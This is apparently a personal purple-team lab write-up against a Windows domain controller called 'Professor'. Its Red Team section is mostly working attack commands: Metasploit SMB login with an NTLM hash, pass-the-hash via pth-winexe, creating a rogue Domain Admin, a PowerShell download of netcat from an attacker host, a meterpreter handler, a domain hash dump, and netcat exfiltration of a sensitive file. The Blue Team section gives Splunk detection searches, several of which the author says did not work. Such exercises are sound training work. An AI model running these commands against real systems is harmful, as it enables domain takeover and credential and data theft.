Purple Team Exercise: Professor
Since we don’t know the password, we’ll have to use the wordlist provided in the /root directory of Kif.
Red Team
nmap 192.168.0.254
nmap -sV -O -p 53,88,135,139,389,445,8089 192.168.0.254 –script=safe -oA nmap
msfconsole
search smb_login
use auxilary/scanner/smb/smb_login
show options
set smbuser Administrator
set smbpass :aad3b435b51404eeaad3b435b51404ee:a6d00d6c85d3a477921688771dba6eaf
set rhosts 192.168.0.251-254
exploit
This only worked when Kali was local to the machine, not over VPN. Not sure why…
use exploit/windows/smb/psexec
Enter same info to get system shell
Because of VPN we need to issue:
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:a6d00d6c85d3a477921688771dba6eaf //192.168.0.254 cmd.exe
net user sqearl Password1 /ADD /DOMAIN
net group “Domain Admins” sqearl /ADD /DOMAIN
A coworker mentioned I could add sqearl to Enterprise Admin’s and would have the domain permissions necessary to later run the meterpreter post script. Thanks Ed!
Login to host via RDP
IEX(new-object System.Net.WebClient).DownloadFile(‘http://10.242.2.2:8000/nc.exe’,’C:\Users\sqearl\Desktop\nc.exe’)
Wireshark/ pcap did not pick this nc.exe example up over powershell
Windows, change to cmd: nc.exe -l -p 1234 > met64.exe
Kali: nc -w 3 192.168.0.254 1234 < met64.exe
use exploit/multi/handler
run
met64.exe
getuid
Exit this session, then execute met64.exe from the pth-winexe session:
ps
Migrate to x64 system process
Ctrl+Z = background meterpreter session
use post/windows/gather/credentials/domain_hashdump
set sessions 4
run
cd C:\Users\Administrator\Desktop
type sensitive_info
Kali:
nc -l -p 2345 > sensitive_info.txt (we need to disable FW for this to work as well)
Windows:
C:\Users\sqearl\Desktop\nc.exe -w 3 10.242.2.2 2345 < sensitive_info.txt
Blue Team
Filter by Professors IP:
Splunk search for snort SCAN alerts
earliest=05/13/2018:16:00:0 latest=05/13/2018:18:25:0 src_ip=”10.242.2.2″ dest_ip=”192.168.0.254″ sourcetype=sguild name=*SCAN* name!=*Dirbuster* name!=*Nikto* | sort 0 _time |table _time src_ip dest_ip name
SMB Alerts during our smb_login attempts
I used this article, but I wasn’t able to log my pass the hash attacks. I must need to look again:
https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis
Here’s the search that “should” detect PTH:
sourcetype=* Logon_Type=3 EventCode=4624 Logon_Process=NtLmSsp Security_ID=”NULL SID” sourcetype=”WinEventLog:Security” Key_Length=0 Account_Name!=”$*” AND Account_Name!=”-” AND Account_Name!=”ANONYMOUS LOGON”
We use process command line to detect the admin’s commands:
host=professor Process_Command_Line=* Account_Name!=*$ Process_Command_Line!=”*xff*” | table _time Account_Name Process_Command_Line status | sort + _time
Splunk Alert:
We should be alerting or at least reporting on these commands. If a domain user is added, maybe an alert.
host=professor Process_Command_Line=”/ADD /DOMAIN”
OSSEC typically alerts on newly created users, and first time logins… For some reason, I don’t see these alerts.
netcat connecting to our Kali IP:
host=professor Process_Command_Line=* Account_Name!=*$ Process_Command_Line!=”*xff*” | table _time Account_Name Process_Command_Line status | sort + _time
We do not have any insight into the meterpreter commands:
host=professor Process_Command_Line=* Account_Name!=*$ Process_Command_Line!=”*xff*” | table _time Account_Name Process_Command_Line status | sort + _time
We aren’t able to intercept this file because it was sent via netcat
I should have logs for this command, but everything run prior to this in meterpreter goes undetected 🙁